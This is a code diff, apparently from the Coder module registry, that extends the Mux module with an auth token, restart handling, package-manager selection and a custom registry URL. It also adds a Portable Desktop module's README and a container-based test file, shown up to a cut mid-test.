       source  = "coder/coder"
       version = ">= 2.5"
     }
+    random = {
+      source  = "hashicorp/random"
+      version = ">= 3.0"
+    }
   }
 }
 
@@ -17,46 +21,97 @@ variable "agent_id" {
 
 variable "port" {
   type        = number
-  description = "The port to run mux on."
+  description = "The port to run Mux on."
   default     = 4000
 }
 
 variable "display_name" {
   type        = string
-  description = "The display name for the mux application."
-  default     = "mux"
+  description = "The display name for the Mux application."
+  default     = "Mux"
 }
 
 variable "slug" {
   type        = string
-  description = "The slug for the mux application."
+  description = "The slug for the Mux application."
   default     = "mux"
 }
 
 variable "install_prefix" {
   type        = string
-  description = "The prefix to install mux to."
+  description = "The prefix to install Mux to."
   default     = "/tmp/mux"
 }
 
 variable "log_path" {
   type        = string
-  description = "The path for mux logs."
+  description = "The path for Mux logs."
   default     = "/tmp/mux.log"
 }
 
-variable "add-project" {
+variable "restart_on_kill" {
+  type        = bool
+  description = "Restart Mux after it exits by waiting briefly, removing the server lock, and launching it again."
+  default     = false
+}
+
+variable "restart_delay_seconds" {
+  type        = number
+  description = "How long to wait before restarting Mux after it exits when restart_on_kill is enabled."
+  default     = 5
+
+  validation {
+    condition     = var.restart_delay_seconds >= 0
+    error_message = "The 'restart_delay_seconds' variable must be greater than or equal to 0."
+  }
+}
+
+variable "max_restart_attempts" {
+  type        = number
+  description = "Maximum whole-number restart attempts before giving up. Set to 0 for unlimited restarts when restart_on_kill is enabled."
+  default     = 0
+
+  validation {
+    condition     = var.max_restart_attempts >= 0 && floor(var.max_restart_attempts) == var.max_restart_attempts
+    error_message = "The 'max_restart_attempts' variable must be a whole number greater than or equal to 0."
+  }
+}
+
+variable "add_project" {
   type        = string
-  description = "Path to add/open as a project in mux (idempotent)."
+  description = "Optional path to add/open as a project in Mux on startup."
+  default     = null
+}
+
+variable "additional_arguments" {
+  type        = string
+  description = "Additional command-line arguments to pass to `mux server` (for example: `--add-project /path --open-mode pinned`)."
   default     = ""
 }
 
 variable "install_version" {
   type        = string
-  description = "The version or dist-tag of mux to install."
+  description = "The version or dist-tag of Mux to install."
   default     = "next"
 }
 
+variable "package_manager" {
+  type        = string
+  description = "Package manager to install Mux. 'auto' detects npm, pnpm, or bun (falling back to tarball download). Set to 'npm', 'pnpm', or 'bun' to force a specific one."
+  default     = "auto"
+  validation {
+    condition     = contains(["auto", "npm", "pnpm", "bun"], var.package_manager)
+    error_message = "The 'package_manager' variable must be one of: 'auto', 'npm', 'pnpm', 'bun'."
+  }
+}
+
+variable "registry_url" {
+  type        = string
+  description = "The npm-compatible registry URL to install Mux from. Override this for private registries or mirrors."
+  default     = "https://registry.npmjs.org"
+}
+
+
 variable "share" {
   type    = string
   default = "owner"
@@ -80,13 +135,13 @@ variable "group" {
 
 variable "install" {
   type        = bool
-  description = "Install mux from the network (npm or tarball). If false, run without installing (requires a pre-installed mux)."
+  description = "Install Mux from the network (npm or tarball). If false, run without installing (requires a pre-installed Mux)."
   default     = true
 }
 
 variable "use_cached" {
   type        = bool
-  description = "Use cached copy of mux if present; otherwise install from npm"
+  description = "Use cached copy of Mux if present; otherwise install from npm"
   default     = false
 }
 
@@ -96,7 +151,7 @@ variable "subdomain" {
     Determines whether the app will be accessed via it's own subdomain or whether it will be accessed via a path on Coder.
     If wildcards have not been setup by the administrator then apps with "subdomain" set to true will not be accessible.
   EOT
-  default     = false
+  default     = true
 }
 
 variable "open_in" {
@@ -113,18 +168,42 @@ variable "open_in" {
   }
 }
 
+# Per-module auth token for cross-site request protection.
+# We pass this token into each mux process at launch time (process-scoped env)
+# and include it in the app URL query string (?token=...).
+#
+# Why process-scoped env instead of a shared coder_env value:
+# multiple mux module instances can target the same agent (different slug/port).
+# A single global MUX_SERVER_AUTH_TOKEN env key would cause collisions.
+resource "random_password" "mux_auth_token" {
+  length  = 64
+  special = false
+}
+
+locals {
+  mux_auth_token = random_password.mux_auth_token.result
+  registry_url   = trimsuffix(var.registry_url, "/")
+}
+
 resource "coder_script" "mux" {
   agent_id     = var.agent_id
-  display_name = "mux"
+  display_name = var.display_name
   icon         = "/icon/mux.svg"
   script = templatefile("${path.module}/run.sh", {
     VERSION : var.install_version,
     PORT : var.port,
     LOG_PATH : var.log_path,
-    ADD_PROJECT : var.add-project,
+    ADD_PROJECT : var.add_project == null ? "" : var.add_project,
+    ADDITIONAL_ARGUMENTS : var.additional_arguments,
     INSTALL_PREFIX : var.install_prefix,
     OFFLINE : !var.install,
     USE_CACHED : var.use_cached,
+    AUTH_TOKEN : local.mux_auth_token,
+    RESTART_ON_KILL : var.restart_on_kill,
+    RESTART_DELAY_SECONDS : var.restart_delay_seconds,
+    MAX_RESTART_ATTEMPTS : var.max_restart_attempts,
+    PACKAGE_MANAGER : var.package_manager,
+    REGISTRY_URL : local.registry_url,
   })
   run_on_start = true
 
@@ -140,7 +219,7 @@ resource "coder_app" "mux" {
   agent_id     = var.agent_id
   slug         = var.slug
   display_name = var.display_name
-  url          = "http://localhost:${var.port}"
+  url          = "http://localhost:${var.port}?token=${local.mux_auth_token}"
   icon         = "/icon/mux.svg"
   subdomain    = var.subdomain
   share        = var.share
@@ -154,5 +233,3 @@ resource "coder_app" "mux" {
     threshold = 6
   }
 }
-
-

registry/coder/modules/mux/mux.tftest.hcl

@@ -20,8 +20,10 @@ run "install_false_and_use_cached_conflict" {
   ]
 }
 
+# Needs command = apply because the URL contains random_password.result,
+# which is unknown during plan.
 run "custom_port" {
-  command = plan
+  command = apply
 
   variables {
     agent_id = "foo"
@@ -29,9 +31,189 @@ run "custom_port" {
   }
 
   assert {
-    condition     = resource.coder_app.mux.url == "http://localhost:8080"
-    error_message = "coder_app URL must use the configured port"
+    condition     = startswith(resource.coder_app.mux.url, "http://localhost:8080?token=")
+    error_message = "coder_app URL must use the configured port and include auth token"
   }
+
+  assert {
+    condition     = trimprefix(resource.coder_app.mux.url, "http://localhost:8080?token=") == random_password.mux_auth_token.result
+    error_message = "URL token must match the generated auth token"
+  }
+}
+
+# Needs command = apply because random_password.result is unknown during plan.
+run "auth_token_in_server_script" {
+  command = apply
+
+  variables {
+    agent_id = "foo"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "MUX_SERVER_AUTH_TOKEN=")
+    error_message = "mux launch script must set MUX_SERVER_AUTH_TOKEN"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, random_password.mux_auth_token.result)
+    error_message = "mux launch script must use the generated auth token"
+  }
+}
+
+# Needs command = apply because random_password.result is unknown during plan.
+run "auth_token_in_url" {
+  command = apply
+
+  variables {
+    agent_id = "foo"
+  }
+
+  assert {
+    condition     = startswith(resource.coder_app.mux.url, "http://localhost:4000?token=")
+    error_message = "coder_app URL must include auth token query parameter"
+  }
+
+  assert {
+    condition     = trimprefix(resource.coder_app.mux.url, "http://localhost:4000?token=") == random_password.mux_auth_token.result
+    error_message = "URL token must match the generated auth token"
+  }
+}
+
+run "custom_additional_arguments" {
+  command = plan
+
+  variables {
+    agent_id             = "foo"
+    additional_arguments = "--open-mode pinned --add-project '/workspaces/my repo'"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "--open-mode pinned --add-project '/workspaces/my repo'")
+    error_message = "mux launch script must include the configured additional arguments"
+  }
+}
+
+run "launcher_logs_external_kills" {
+  command = plan
+
+  variables {
+    agent_id = "foo"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "shell exit code $exit_code")
+    error_message = "mux launcher must log the shell exit code when the server dies unexpectedly"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "SIGKILL usually means the process was killed externally or by the OOM killer.")
+    error_message = "mux launcher must explain SIGKILL exits in the log"
+  }
+}
+
+run "restart_on_kill_enabled" {
+  command = plan
+
+  variables {
+    agent_id              = "foo"
+    restart_on_kill       = true
+    restart_delay_seconds = 7
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "restart_on_kill_value=\"true\"")
+    error_message = "mux launcher must receive the restart_on_kill setting"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "restart_delay_seconds_value=\"7\"")
+    error_message = "mux launcher must receive the configured restart delay"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "Waiting $${RESTART_DELAY_SECONDS_VALUE} seconds before restarting mux after it exited.")
+    error_message = "mux launcher must log the restart delay before relaunching"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "Removing $HOME/.mux/server.lock before restarting mux.")
+    error_message = "mux launcher must clean up the server lock before relaunching"
+  }
+
+  assert {
+    condition     = !strcontains(resource.coder_script.mux.script, "\"$exit_code\" -le 128")
+    error_message = "mux launcher must no longer exclude non-signal exits from restart handling"
+  }
+
+  assert {
+    condition     = !strcontains(resource.coder_script.mux.script, "1|2|15)")
+    error_message = "mux launcher must no longer exclude intentional signals from restart handling"
+  }
+}
+
+run "restart_on_kill_with_restart_cap" {
+  command = plan
+
+  variables {
+    agent_id              = "foo"
+    restart_on_kill       = true
+    restart_delay_seconds = 7
+    max_restart_attempts  = 2
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "max_restart_attempts_value=\"2\"")
+    error_message = "mux launcher must receive the configured restart cap"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "Mux will stop restarting after $${max_restart_attempts_value} restart attempts.")
+    error_message = "mux launcher must describe the configured restart cap"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "Reached the max restart attempts limit ($MAX_RESTART_ATTEMPTS_VALUE); not restarting mux again.")
+    error_message = "mux launcher must log when it hits the restart cap"
+  }
+}
+
+run "invalid_max_restart_attempts" {
+  command = plan
+
+  variables {
+    agent_id             = "foo"
+    max_restart_attempts = -1
+  }
+
+  expect_failures = [
+    var.max_restart_attempts
+  ]
+}
+
+run "fractional_max_restart_attempts" {
+  command = plan
+
+  variables {
+    agent_id             = "foo"
+    max_restart_attempts = 0.5
+  }
+
+  expect_failures = [
+    var.max_restart_attempts
+  ]
+}
+
+run "invalid_restart_delay_seconds" {
+  command = plan
+
+  variables {
+    agent_id              = "foo"
+    restart_delay_seconds = -1
+  }
+
+  expect_failures = [
+    var.restart_delay_seconds
+  ]
 }
 
 run "custom_version" {
@@ -63,4 +245,95 @@ run "use_cached_only_success" {
   }
 }
 
+# Custom package_manager should appear in generated script
+run "custom_package_manager_npm" {
+  command = plan
+
+  variables {
+    agent_id        = "foo"
+    package_manager = "npm"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "PM_CMD=\"npm\"")
+    error_message = "mux script must set PM_CMD to the configured package manager"
+  }
+}
+
+run "custom_package_manager_pnpm" {
+  command = plan
+
+  variables {
+    agent_id        = "foo"
+    package_manager = "pnpm"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "PM_CMD=\"pnpm\"")
+    error_message = "mux script must set PM_CMD to the configured package manager"
+  }
+}
+
+run "custom_package_manager_bun" {
+  command = plan
+
+  variables {
+    agent_id        = "foo"
+    package_manager = "bun"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "PM_CMD=\"bun\"")
+    error_message = "mux script must set PM_CMD to the configured package manager"
+  }
+}
+
+# Invalid package_manager should fail validation
+run "invalid_package_manager" {
+  command = plan
+
+  variables {
+    agent_id        = "foo"
+    package_manager = "yarn"
+  }
+
+  expect_failures = [
+    var.package_manager
+  ]
+}
+
+# Custom registry_url should appear in generated script
+run "custom_registry_url" {
+  command = plan
+
+  variables {
+    agent_id     = "foo"
+    registry_url = "https://npm.example.com"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "https://npm.example.com")
+    error_message = "mux script must use the configured registry URL"
+  }
+
+  assert {
+    condition     = !strcontains(resource.coder_script.mux.script, "registry.npmjs.org")
+    error_message = "mux script must not contain hardcoded registry.npmjs.org when custom registry is set"
+  }
+}
+
+# registry_url trailing slash should be stripped
+run "registry_url_trailing_slash" {
+  command = plan
+
+  variables {
+    agent_id     = "foo"
+    registry_url = "https://npm.example.com/"
+  }
+
+  assert {
+    condition     = strcontains(resource.coder_script.mux.script, "https://npm.example.com/mux/")
+    error_message = "registry URL trailing slash must be stripped to avoid double slashes"
+  }
+}
 

registry/coder/modules/mux/run.sh

@@ -5,24 +5,195 @@ RESET='\033[0m'
 MUX_BINARY="${INSTALL_PREFIX}/mux"
 
 function run_mux() {
-  # Remove stale server lock if present
-  rm -f "$HOME/.mux/server.lock"
-
   local port_value
+  local auth_token_value
+  local restart_on_kill_value
+  local restart_delay_seconds_value
+  local max_restart_attempts_value
+
   port_value="${PORT}"
+  auth_token_value="${AUTH_TOKEN}"
+  restart_on_kill_value="${RESTART_ON_KILL}"
+  restart_delay_seconds_value="${RESTART_DELAY_SECONDS}"
+  max_restart_attempts_value="${MAX_RESTART_ATTEMPTS}"
+
   if [ -z "$port_value" ]; then
     port_value="4000"
   fi
+
+  if [ -z "$restart_delay_seconds_value" ]; then
+    restart_delay_seconds_value="5"
+  fi
+
+  if [ -z "$max_restart_attempts_value" ]; then
+    max_restart_attempts_value="0"
+  fi
+
+  mkdir -p "$(dirname "${LOG_PATH}")"
+
   # Build args for mux (POSIX-compatible, avoid bash arrays)
   set -- server --port "$port_value"
   if [ -n "${ADD_PROJECT}" ]; then
     set -- "$@" --add-project "${ADD_PROJECT}"
   fi
+
+  # Parse additional user-supplied server arguments while preserving quoted groups.
+  if [ -n "${ADDITIONAL_ARGUMENTS}" ]; then
+    local parsed_additional_arguments
+    if ! parsed_additional_arguments="$(printf "%s\n" "${ADDITIONAL_ARGUMENTS}" | xargs -n1 printf "%s\n" 2> /dev/null)"; then
+      echo "❌ Failed to parse additional_arguments. Ensure quotes are balanced."
+      exit 1
+    fi
+    while IFS= read -r parsed_arg; do
+      [ -n "$parsed_arg" ] || continue
+      set -- "$@" "$parsed_arg"
+    done << EOF_ARGS
+$${parsed_additional_arguments}
+EOF_ARGS
+  fi
+
   echo "🚀 Starting mux server on port $port_value..."
   echo "Check logs at ${LOG_PATH}!"
-  PORT="$port_value" "$MUX_BINARY" "$@" > "${LOG_PATH}" 2>&1 &
+  echo "ℹ️ Mux exit details will be appended to ${LOG_PATH} by the launcher."
+  if [ "$restart_on_kill_value" = true ]; then
+    echo "ℹ️ Auto-restart after mux exits is enabled with a $${restart_delay_seconds_value}-second delay."
+    if [ "$max_restart_attempts_value" = "0" ]; then
+      echo "ℹ️ Automatic restarts are unlimited for every mux exit."
+    else
+      echo "ℹ️ Mux will stop restarting after $${max_restart_attempts_value} restart attempts."
+    fi
+  fi
+
+  nohup env \
+    LOG_PATH="${LOG_PATH}" \
+    MUX_BINARY="$MUX_BINARY" \
+    AUTH_TOKEN="$auth_token_value" \
+    PORT_VALUE="$port_value" \
+    RESTART_ON_KILL_VALUE="$restart_on_kill_value" \
+    RESTART_DELAY_SECONDS_VALUE="$restart_delay_seconds_value" \
+    MAX_RESTART_ATTEMPTS_VALUE="$max_restart_attempts_value" \
+    bash -s -- "$@" > /dev/null 2>&1 << 'EOF_LAUNCHER' &
+signal_name() {
+  local signal_number="$1"
+  local resolved_signal
+
+  resolved_signal="$(kill -l "$signal_number" 2> /dev/null || true)"
+  if [ -n "$resolved_signal" ]; then
+    printf '%s' "$resolved_signal"
+    return 0
+  fi
+
+  printf 'SIG%s' "$signal_number"
 }
 
+append_kernel_kill_context() {
+  local mux_pid="$1"
+  local kernel_context=""
+
+  if command -v dmesg > /dev/null 2>&1; then
+    kernel_context="$(dmesg -T 2> /dev/null | grep -Ei "Killed process $mux_pid|out of memory|oom-killer|oom reaper" | tail -n 10 || true)"
+  fi
+
+  if [ -z "$kernel_context" ] && command -v journalctl > /dev/null 2>&1; then
+    kernel_context="$(journalctl -k -n 200 --no-pager 2> /dev/null | grep -Ei "Killed process $mux_pid|out of memory|oom-killer|oom reaper" | tail -n 10 || true)"
+  fi
+
+  if [ -n "$kernel_context" ]; then
+    echo "Recent kernel kill context:"
+    echo "$kernel_context"
+  else
+    echo "No kernel OOM/kill context was available (dmesg/journalctl unavailable or permission denied)."
+  fi
+}
+
+cleanup_mux_lock() {
+  rm -f "$HOME/.mux/server.lock"
+}
+
+should_restart_mux() {
+  [ "$RESTART_ON_KILL_VALUE" = "true" ]
+}
+
+log_mux_exit() {
+  local mux_pid="$1"
+  local exit_code="$2"
+  local timestamp
+
+  timestamp="$(date -Iseconds 2> /dev/null || date)"
+
+  if [ "$exit_code" -eq 0 ]; then
+    echo "[$timestamp] mux server exited cleanly."
+    return 0
+  fi
+
+  if [ "$exit_code" -gt 128 ]; then
+    local signal_number=$((exit_code - 128))
+    local signal_label
+
+    signal_label="$(signal_name "$signal_number")"
+    echo "[$timestamp] mux server exited due to signal $signal_label ($signal_number); shell exit code $exit_code."
+
+    if [ "$signal_number" -eq 9 ]; then
+      echo "[$timestamp] SIGKILL usually means the process was killed externally or by the OOM killer."
+      append_kernel_kill_context "$mux_pid"
+    fi
+
+    echo "[$timestamp] Check the earlier mux log lines for any in-process crash breadcrumbs from mux itself."
+    return 0
+  fi
+
+  echo "[$timestamp] mux server exited with code $exit_code."
+  echo "[$timestamp] Check the earlier mux log lines for any in-process crash breadcrumbs from mux itself."
+}
+
+log_mux_restart_wait() {
+  local timestamp
+
+  timestamp="$(date -Iseconds 2> /dev/null || date)"
+  echo "[$timestamp] Waiting $${RESTART_DELAY_SECONDS_VALUE} seconds before restarting mux after it exited."
+}
+
+log_mux_restart_cleanup() {
+  local timestamp
+
+  timestamp="$(date -Iseconds 2> /dev/null || date)"
+  echo "[$timestamp] Removing $HOME/.mux/server.lock before restarting mux."
+}
+
+log_mux_restart_cap_reached() {
+  local timestamp
+
+  timestamp="$(date -Iseconds 2> /dev/null || date)"
+  echo "[$timestamp] Reached the max restart attempts limit ($MAX_RESTART_ATTEMPTS_VALUE); not restarting mux again."
+}
+
+restart_attempt_count=0
+while true; do
+  cleanup_mux_lock
+  MUX_SERVER_AUTH_TOKEN="$AUTH_TOKEN" PORT="$PORT_VALUE" "$MUX_BINARY" "$@" >> "$LOG_PATH" 2>&1 &
+  mux_pid=$!
+  wait "$mux_pid"
+  exit_code=$?
+  log_mux_exit "$mux_pid" "$exit_code" >> "$LOG_PATH" 2>&1
+
+  if should_restart_mux; then
+    if [ "$MAX_RESTART_ATTEMPTS_VALUE" -gt 0 ] && [ "$restart_attempt_count" -ge "$MAX_RESTART_ATTEMPTS_VALUE" ]; then
+      log_mux_restart_cap_reached >> "$LOG_PATH" 2>&1
+      break
+    fi
+
+    restart_attempt_count=$((restart_attempt_count + 1))
+    log_mux_restart_wait >> "$LOG_PATH" 2>&1
+    sleep "$RESTART_DELAY_SECONDS_VALUE"
+    cleanup_mux_lock
+    log_mux_restart_cleanup >> "$LOG_PATH" 2>&1
+    continue
+  fi
+
+  break
+done
+EOF_LAUNCHER
+}
 # Check if mux is already installed for offline mode
 if [ "${OFFLINE}" = true ]; then
   if [ -f "$MUX_BINARY" ]; then
@@ -36,7 +207,7 @@ fi
 
 # If there is no cached install OR we don't want to use a cached install
 if [ ! -f "$MUX_BINARY" ] || [ "${USE_CACHED}" != true ]; then
-  printf "$${BOLD}Installing mux from npm...\n"
+  printf "$${BOLD}Installing mux...\n"
 
   # Clean up from other install (in case install prefix changed).
   if [ -n "$CODER_SCRIPT_BIN_DIR" ] && [ -e "$CODER_SCRIPT_BIN_DIR/mux" ]; then
@@ -45,41 +216,76 @@ if [ ! -f "$MUX_BINARY" ] || [ "${USE_CACHED}" != true ]; then
 
   mkdir -p "$(dirname "$MUX_BINARY")"
 
-  if command -v npm > /dev/null 2>&1; then
-    echo "📦 Installing mux via npm into ${INSTALL_PREFIX}..."
+  # Determine which package manager to use
+  PM_CMD=""
+  if [ "${PACKAGE_MANAGER}" = "auto" ]; then
+    for pm in npm pnpm bun; do
+      if command -v "$pm" > /dev/null 2>&1; then
+        PM_CMD="$pm"
+        break
+      fi
+    done
+  else
+    PM_CMD="${PACKAGE_MANAGER}"
+    if ! command -v "$PM_CMD" > /dev/null 2>&1; then
+      echo "❌ Configured package manager '${PACKAGE_MANAGER}' not found on PATH"
+      exit 1
+    fi
+  fi
+
+  if [ -n "$PM_CMD" ]; then
+    echo "📦 Installing mux via $PM_CMD into ${INSTALL_PREFIX}..."
     NPM_WORKDIR="${INSTALL_PREFIX}/npm"
     mkdir -p "$NPM_WORKDIR"
     cd "$NPM_WORKDIR" || exit 1
     if [ ! -f package.json ]; then
       echo '{}' > package.json
     fi
-    echo "⏭️  Skipping npm lifecycle scripts with --ignore-scripts"
+    echo "⏭️  Skipping lifecycle scripts with --ignore-scripts"
     PKG="mux"
     if [ -z "${VERSION}" ] || [ "${VERSION}" = "latest" ]; then
       PKG_SPEC="$PKG@latest"
     else
       PKG_SPEC="$PKG@${VERSION}"
     fi
-    if ! npm install --no-audit --no-fund --omit=dev --ignore-scripts "$PKG_SPEC"; then
-      echo "❌ Failed to install mux via npm"
+    INSTALL_OK=true
+    case "$PM_CMD" in
+      npm)
+        if ! npm install --no-audit --no-fund --omit=dev --ignore-scripts --registry "${REGISTRY_URL}" "$PKG_SPEC"; then
+          INSTALL_OK=false
+        fi
+        ;;
+      pnpm)
+        if ! pnpm add --ignore-scripts --registry "${REGISTRY_URL}" "$PKG_SPEC"; then
+          INSTALL_OK=false
+        fi
+        ;;
+      bun)
+        if ! bun add --ignore-scripts --registry "${REGISTRY_URL}" "$PKG_SPEC"; then
+          INSTALL_OK=false
+        fi
+        ;;
+    esac
+    if [ "$INSTALL_OK" != true ]; then
+      echo "❌ Failed to install mux via $PM_CMD"
       exit 1
     fi
     # Determine the installed binary path
     BIN_DIR="$NPM_WORKDIR/node_modules/.bin"
     CANDIDATE="$BIN_DIR/mux"
     if [ ! -f "$CANDIDATE" ]; then
-      echo "❌ Could not locate mux binary after npm install"
+      echo "❌ Could not locate mux binary after $PM_CMD install"
       exit 1
     fi
     chmod +x "$CANDIDATE" || true
     ln -sf "$CANDIDATE" "$MUX_BINARY"
   else
-    echo "📥 npm not found; downloading tarball from npm registry..."
+    echo "📥 No package manager found; downloading tarball from registry..."
     VERSION_TO_USE="${VERSION}"
     if [ -z "$VERSION_TO_USE" ]; then
       VERSION_TO_USE="next"
     fi
-    META_URL="https://registry.npmjs.org/mux/$VERSION_TO_USE"
+    META_URL="${REGISTRY_URL}/mux/$VERSION_TO_USE"
     META_JSON="$(curl -fsSL "$META_URL" || true)"
     if [ -z "$META_JSON" ]; then
       echo "❌ Failed to fetch npm metadata: $META_URL"
@@ -118,7 +324,7 @@ if [ ! -f "$MUX_BINARY" ] || [ "${USE_CACHED}" != true ]; then
         echo "❌ Could not determine version for mux"
         exit 1
       fi
-      TARBALL_URL="https://registry.npmjs.org/mux/-/mux-$VERSION_TO_USE.tgz"
+      TARBALL_URL="${REGISTRY_URL}/mux/-/mux-$VERSION_TO_USE.tgz"
     fi
     TMP_DIR="$(mktemp -d)"
     TAR_PATH="$TMP_DIR/mux.tgz"

registry/coder/modules/portabledesktop/README.md

@@ -0,0 +1,46 @@
+---
+display_name: Portable Desktop
+description: Install the portabledesktop binary for lightweight Linux desktop sessions.
+icon: ../../../../.icons/desktop.svg
+verified: true
+tags: [desktop, vnc, ai]
+---
+
+# Portable Desktop
+
+Install [portabledesktop](https://github.com/coder/portabledesktop) for lightweight Linux desktop sessions over VNC. The binary is stored in the agent's script data directory and is automatically available on PATH via `CODER_SCRIPT_BIN_DIR`.
+
+```tf
+module "portabledesktop" {
+  source   = "registry.coder.com/coder/portabledesktop/coder"
+  version  = "0.1.0"
+  agent_id = coder_agent.example.id
+}
+```
+
+## Examples
+
+### Custom download URL with checksum verification
+
+```tf
+module "portabledesktop" {
+  source   = "registry.coder.com/coder/portabledesktop/coder"
+  version  = "0.1.0"
+  agent_id = coder_agent.example.id
+  url      = "https://example.com/portabledesktop-linux-x64"
+  sha256   = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
+}
+```
+
+### Additionally copy to a system path
+
+Use `install_dir` to copy the binary to a system-wide directory in addition to the default script data directory:
+
+```tf
+module "portabledesktop" {
+  source      = "registry.coder.com/coder/portabledesktop/coder"
+  version     = "0.1.0"
+  agent_id    = coder_agent.example.id
+  install_dir = "/usr/local/bin"
+}
+```

registry/coder/modules/portabledesktop/main.test.ts

@@ -0,0 +1,242 @@
+import { describe, expect, it } from "bun:test";
+import {
+  execContainer,
+  findResourceInstance,
+  removeContainer,
+  runContainer,
+  runTerraformApply,
+  runTerraformInit,
+  testRequiredVariables,
+  type TerraformState,
+} from "~test";
+
+interface TestFixture {
+  state: TerraformState;
+  server: ReturnType<typeof Bun.serve>;
+  [Symbol.asyncDispose](): Promise<void>;
+}
+
+interface ContainerHandle {
+  id: string;
+  [Symbol.asyncDispose](): Promise<void>;
+}
+
+async function setupContainer(image: string): Promise<ContainerHandle> {
+  const id = await runContainer(image);
+  return {
+    id,
+    [Symbol.asyncDispose]: async () => {
+      await removeContainer(id);
+    },
+  };
+}
+
+const ENV_PREFIX =
+  'export CODER_SCRIPT_DATA_DIR=/tmp/coder-script-data && export CODER_SCRIPT_BIN_DIR=/tmp/coder-script-data/bin && mkdir -p "$CODER_SCRIPT_DATA_DIR" "$CODER_SCRIPT_BIN_DIR" && ';
+
+async function setupFakeBinaryServer(
+  dir: string,
+  extraVars?: Record<string, string>,
+): Promise<TestFixture> {
+  const fakeBinary = "#!/bin/sh\necho portabledesktop";
+  const server = Bun.serve({
+    port: 0,
+    fetch() {
+      return new Response(fakeBinary);
+    },
+  });
+
+  const state = await runTerraformApply(dir, {
+    agent_id: "foo",
+    url: `http://localhost:${server.port}/portabledesktop`,
+    ...extraVars,
+  });
+
+  return {
+    state,
+    server,
+    [Symbol.asyncDispose]: async () => {
+      server.stop(true);
+    },
+  };
+}
+
+describe("portabledesktop", async () => {
+  await runTerraformInit(import.meta.dir);
+
+  testRequiredVariables(import.meta.dir, {
+    agent_id: "foo",
+  });
+
+  it("installs portabledesktop successfully", async () => {
+    await using fixture = await setupFakeBinaryServer(import.meta.dir);
+    await using container = await setupContainer("alpine/curl");
+
+    const script = findResourceInstance(fixture.state, "coder_script").script;
+    const resp = await execContainer(container.id, [
+      "sh",
+      "-c",
+      ENV_PREFIX + script,
+    ]);
+
+    expect(resp.exitCode).toBe(0);
+    expect(resp.stdout).toContain("portabledesktop installed successfully");
+
+    // Check binary exists at CODER_SCRIPT_DATA_DIR.
+    const checkBinary = await execContainer(container.id, [
+      "test",
+      "-x",
+      "/tmp/coder-script-data/portabledesktop",
+    ]);
+    expect(checkBinary.exitCode).toBe(0);
+
+    // Check symlink exists at CODER_SCRIPT_BIN_DIR.
+    const checkSymlink = await execContainer(container.id, [
+      "test",
+      "-L",
+      "/tmp/coder-script-data/bin/portabledesktop",
+    ]);
+    expect(checkSymlink.exitCode).toBe(0);
+  }, 30000);
+
+  it("verifies checksum when sha256 is provided", async () => {
+    const fakeBinary = "#!/bin/sh\necho portabledesktop";
+    const hasher = new Bun.CryptoHasher("sha256");
+    hasher.update(fakeBinary);
+    const sha256 = hasher.digest("hex");
+
+    await using fixture = await setupFakeBinaryServer(import.meta.dir, {
+      sha256,
+    });
+    await using container = await setupContainer("alpine/curl");
+
+    const script = findResourceInstance(fixture.state, "coder_script").script;
+    const resp = await execContainer(container.id, [
+      "sh",
+      "-c",
+      ENV_PREFIX + script,
+    ]);
+
+    expect(resp.exitCode).toBe(0);
+    expect(resp.stdout).toContain("Checksum verified successfully");
+    expect(resp.stdout).toContain("portabledesktop installed successfully");
+  }, 30000);
+
+  it("fails when sha256 does not match", async () => {
+    const wrongSha256 =
+      "0000000000000000000000000000000000000000000000000000000000000000";
+
+    await using fixture = await setupFakeBinaryServer(import.meta.dir, {
+      sha256: wrongSha256,
+    });
+    await using container = await setupContainer("alpine/curl");
+
+    const script = findResourceInstance(fixture.state, "coder_script").script;
+    const resp = await execContainer(container.id, [
+      "sh",
+      "-c",
+      ENV_PREFIX + script,
+    ]);
+
+    expect(resp.exitCode).toBe(1);
+    expect(resp.stdout).toContain("Checksum mismatch");
+  }, 30000);
+
+  it("skips checksum verification when sha256 is not set", async () => {
+    await using fixture = await setupFakeBinaryServer(import.meta.dir);
+    await using container = await setupContainer("alpine/curl");
+
+    const script = findResourceInstance(fixture.state, "coder_script").script;
+    const resp = await execContainer(container.id, [
+      "sh",
+      "-c",
+      ENV_PREFIX + script,
+    ]);
+
+    expect(resp.exitCode).toBe(0);
+    expect(resp.stdout).not.toContain("Checksum verified");
+    expect(resp.stdout).toContain("portabledesktop installed successfully");
+  }, 30000);
+
+  it("falls back to sudo when install_dir is not writable", async () => {
+    await using fixture = await setupFakeBinaryServer(import.meta.dir, {
+      install_dir: "/usr/local/bin",
+    });
+    await using container = await setupContainer("alpine/curl");
+
+    await execContainer(container.id, [
+      "sh",
+      "-c",
+      "apk add sudo && " +
+        "adduser -D testuser && " +
+        "echo 'testuser ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers && " +
+        "mkdir -p /usr/local/bin",
+    ]);
+
+    const script = findResourceInstance(fixture.state, "coder_script").script;
+    const resp = await execContainer(
+      container.id,
+      ["sh", "-c", ENV_PREFIX + script],
+      ["--user", "testuser"],
+    );
+
+    expect(resp.exitCode).toBe(0);
+    expect(resp.stdout).toContain("via sudo");
+    expect(resp.stdout).toContain("portabledesktop installed successfully");
+
+    // Verify the binary was copied to the install_dir.
+    const check = await execContainer(container.id, [
+      "test",
+      "-x",
+      "/usr/local/bin/portabledesktop",
+    ]);
+    expect(check.exitCode).toBe(0);
+  }, 30000);
+
+  it("creates install_dir if it does not exist", async () => {
